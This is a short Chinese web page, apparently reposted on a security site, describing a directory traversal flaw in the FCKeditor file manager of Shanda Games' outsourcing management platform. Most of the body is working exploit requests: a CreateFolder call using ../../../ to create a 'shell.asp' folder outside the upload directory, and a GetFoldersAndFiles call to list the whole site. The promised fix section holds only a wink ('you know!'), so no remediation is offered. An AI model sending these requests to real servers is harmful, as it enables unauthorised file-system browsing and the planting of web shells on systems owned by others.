漏洞分析

关注公众号 jb51net

关闭
网络安全 > 漏洞分析 >

盛大游戏外包管理平台FCK列全盘目路分析与解决方案

无名小卒

修改CurrentFolder 参数使用../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:


修复方案:
你懂的!